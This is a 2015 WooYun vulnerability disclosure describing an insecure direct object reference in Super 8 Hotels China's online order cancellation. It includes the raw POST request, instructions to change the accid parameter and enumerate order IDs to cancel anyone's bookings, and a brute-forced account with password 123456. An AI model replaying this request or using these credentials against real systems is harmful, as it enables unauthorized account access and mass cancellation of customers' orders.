当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096757

漏洞标题:速8酒店设计缺陷全国任意订单取消漏洞

相关厂商:速8酒店

漏洞作者: 路人甲

提交时间:2015-02-11 11:20

修复时间:2015-02-16 11:22

公开时间:2015-02-16 11:22

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:18

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-11: 细节已通知厂商并且等待厂商处理中
2015-02-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

速8酒店设计缺陷全国任意订单取消漏洞

详细说明:

99%都做了 却错在最后一步 前面都有鉴权订单是不是属于当前用户的,却在最后一步选择取消原因之后数据库操作取消订单时没有判断订单是否属于当前用户
另外账号在一定程度上也是可以爆破的
305692193 爆破获得的账号 :弱口令 123456
测试账号:305692221 123456

屏幕快照 2015-02-11 上午11.13.18.png


POST /Mem/DeleteOrder.aspx?accid=31391604 HTTP/1.1
Host: www.super8.com.cn
Proxy-Connection: keep-alive
Content-Length: 734
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.super8.com.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://www.super8.com.cn/Mem/DeleteOrder.aspx?accid=31391604
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: __ag_cm_=1423622105528; ASP.NET_SessionId=5e5ypnzeutwj2uygjvqxufve; __qc_wId=138; pgv_pvid=9468599688; _gat=1; __qc__k=; __ozlvd1031=1423623805; _ga=GA1.3.39541148.1423622105; Hm_lvt_5ea893975c140fb2300e807a3da2b058=1423622105; Hm_lpvt_5ea893975c140fb2300e807a3da2b058=1423623806; ag_fid=rwhikISX7yjQ9JIF
AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3
__VIEWSTATE=%2FwEPDwUJNjMyNzQ1MjU0D2QWBAIDD2QWBgIBDxYCHgVzdHlsZQUIZGlzcGxheTpkAgIPFgIfAAUMZGlzcGxheTpub25lZAIEDw8WAh4EVGV4dAUBMGRkAgcPZBYCZg8WAh4LXyFJdGVtQ291bnQCBhYMZg9kFgJmDxUCAzEyNgzkvJrlkZjmiYvlhoxkAgEPZBYCZg8VAgMxMjUM5Lya5ZGY5YWs5ZGKZAICD2QWAmYPFQICMzEM5Lya5ZGY5rS75YqoZAIDD2QWAmYPFQIDMjExEuS8muWRmOeCueivhOinhOWImWQCBA9kFgJmDxUCAjExGemAnzjku6Pph5HliLjkvb%2FnlKjop4TliJlkAgUPZBYCZg8VAgIxMB%2FpgJ845YWN6LS55L2P5a6%2F5L%2Bh5L2%2F55So6KeE5YiZZGR4jNPdiF4d9abvTTxpH3%2FfWMpnwA%3D%3D&__VIEWSTATEGENERATOR=29D1FDD0&__EVENTVALIDATION=%2FwEWEAK1l6DlDwLKt8bFAwLLt8bFAwLIt8bFAwLJt8bFAwLOt8bFAwLPt8bFAwLMt8bFAwLdt8bFAwLSt8bFAwLKt4bGAwLKt4rGAwLKt47GAwLF2OyrDwLdkpmPAQK%2BrvNOj4OHmmrx8cXNZVcIqmNwBqGN2SU%3D&rblCancel=1&btnOK=%E7%A1%AE%E5%AE%9A


在取消订单的最后一步修改accid参数为任意想要取消的订单ID 当然 也可以进行遍历 批量恶意取消他人订单

屏幕快照 2015-02-11 上午11.14.25.png


屏幕快照 2015-02-11 上午11.14.37.png


屏幕快照 2015-02-11 上午11.16.15.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-16 11:22

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2015-02-11 11:22 | 我是小号6 ( 实习白帽子 | Rank:37 漏洞数:25 | http://www.a666666.wang/)

    MLGB好不容易找到个妹纸想打响小年第一炮结果开房订单取消了原来是你

  2. 2015-02-11 11:34 | 小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)

    楼上亮了!

  3. 2015-02-11 11:59 | hkAssassin ( 普通白帽子 | Rank:358 漏洞数:66 | 我是一只毛毛虫。)

    1楼亮了!

  4. 2015-02-16 12:48 | 庙口大王 ( 路人 | Rank:30 漏洞数:6 | 呵呵)

    取消订单的时候一定很伤心。